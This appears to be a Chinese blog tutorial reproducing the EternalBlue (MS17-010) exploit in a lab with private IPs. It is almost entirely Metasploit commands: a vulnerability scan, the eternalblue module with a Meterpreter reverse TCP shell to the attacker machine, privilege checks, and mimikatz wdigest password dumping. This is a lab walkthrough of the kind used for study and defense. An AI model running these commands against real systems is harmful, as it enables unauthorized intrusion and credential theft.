我是靠谱客的博主 激昂芹菜,这篇文章主要介绍EternalBlue永恒之蓝漏洞(MS17-010)复现,现在分享给大家,希望可以做个参考。

测试环境

靶机:    Windows7                IP:192.168.5.90   开放445端口  关闭防火墙

攻击机:Windows10/kali        IP:192.168.5.42

1、查询漏洞模块

search ms17-010

2、使用扫描模块扫描是否有永恒之蓝漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.5.90

set threads 1

exploit

可以看出存在该漏洞

 

3、使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.5.42

set rhosts 192.168.5.90

set rport 445

exploit

getuid 为系统权限  捕获桌面

 

load mimkatz  运行wdigest 获取密码

另外还有很多功能可使用。。。

最后

以上就是激昂芹菜最近收集整理的关于EternalBlue永恒之蓝漏洞(MS17-010)复现的全部内容,更多相关EternalBlue永恒之蓝漏洞(MS17-010)复现内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(144)

评论列表共有 0 条评论

立即
投稿
返回
顶部